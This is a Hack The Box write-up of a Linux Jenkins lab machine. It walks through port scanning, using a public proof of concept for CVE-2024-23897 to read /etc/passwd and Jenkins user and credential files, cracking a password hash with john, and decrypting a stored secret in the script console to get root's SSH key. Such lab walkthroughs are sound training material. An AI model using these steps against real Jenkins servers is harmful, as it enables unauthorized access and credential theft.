Builder

February 15, 2026

Driver

Created by	Page	Difficulty	OS
polarbearer & amra13579	Hack The Box	Medium	Linux

Enumeration

The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.

  nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.10 -oG scan
  /opt/extractports scan
  nmap -p22,8080 -Pn -sCV 10.10.11.10 -oN ports

When I access the website, I find Jenkins version 2.441. When I search for information about this version, I find a CVE associated with it, CVE-2024-23897.
I use a POC that exploits this vulnerability and manage to read system files, LFI.
```
  python3 51993.py -u http://10.10.11.10:8080/ -p /etc/passwd
```

I can read the system’s primary flag.

  python3 51993.py -u http://10.10.11.10:8080/ -p /var/jenkins_home/user.txt

By consulting the Jenkins documentation, I can see the folder and file structure.

I consult users

  python3 51993.py -u http://10.10.11.10:8080/ -p /var/jenkins_home/users/users.xml

I find the user jennifer and the path to the folder containing her information. I check her configuration file and find her encrypted password.
```
  python3 51993.py -u http://10.10.11.10:8080/ -p /var/jenkins_home/users/jennifer_12108429903186576833/config.xml
```

I break the hash to get the password in plain text.

  john --wordlist=/usr/share/wordlists/rockyou.txt hash 

With this counter I can’t use ssh, but I can use Jenkins. When I log in, I can see that Jenkins has defined a password for the root user.
By viewing the source code of the page, I can see the content of the encrypted key.

To decrypt it, I can use the Jenkins console itself.

  encrypted_pw = '{AQAAABAAAAoXXX....XXSM=}'
  passwd = hudson.util.Secret.decrypt(encrypted_pw)
  println(passwd)

It shows me an SSH key in plain text. I use it and connect to the system as the root user.
```
  ssh -i privatekey root@10.10.11.10 
```
Now that I am the root user and have an interactive console, I can read the second flag of the system.